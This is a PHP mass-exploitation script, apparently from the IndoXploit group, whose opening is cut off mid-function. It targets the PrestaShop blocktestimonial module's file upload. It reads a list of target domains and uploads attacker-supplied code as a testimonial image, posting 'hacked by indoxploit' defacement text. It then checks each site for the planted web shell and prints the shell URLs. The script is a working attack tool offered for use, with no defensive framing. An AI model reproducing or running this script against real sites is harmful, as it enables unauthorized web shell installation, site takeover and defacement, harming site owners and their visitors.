IndoXploit Tools - PS Modules Blocktestimonial File Upload
$info['http_code'],
"response" => $exec
);
curl_close($ch);
}
$filename = htmlspecialchars($_POST['filename']);
$script = $_POST['source'];
$domains = explode("\r\n", htmlspecialchars($_POST['target']));
$go = $_POST['exploit'];
if(isset($go)) {
$handle = fopen($filename, "w");
fwrite($handle, $script);
fclose($handle);
foreach($domains as $target) {
if(!preg_match("/^http:\/\//", $target) AND !preg_match("/^https:\/\//", $target)) {
$target = "http://$target/";
}
echo "[+] URL: $target
";
$post = array(
"testimonial_submitter_name" => "indoxploit",
"testimonial_title" => "hacked by indoxploit",
"testimonial_main_message" => "hacked by indoxploit",
"testimonial_img" => "@$filename",
"testimonial" => "Submit Testimonial",
);
$exploit = curl("$target/modules/blocktestimonial/addtestimonial.php", TRUE, $post, FALSE, NULL, TRUE);
$cek_shell = curl("$target/upload/$filename", FALSE, NULL, FALSE, NULL, FALSE);
if(preg_match("/Your testimonial was submitted successfully./", $exploit['response'])) {
echo "[+] Successfully !
";
if($cek_shell['http'] == 200) {
echo "[+] $target/upload/$filename
";
} else {
echo "[+] Shell not Found :(
";
}
} else {
echo "[+] Fail :(
";
}
}
}
?>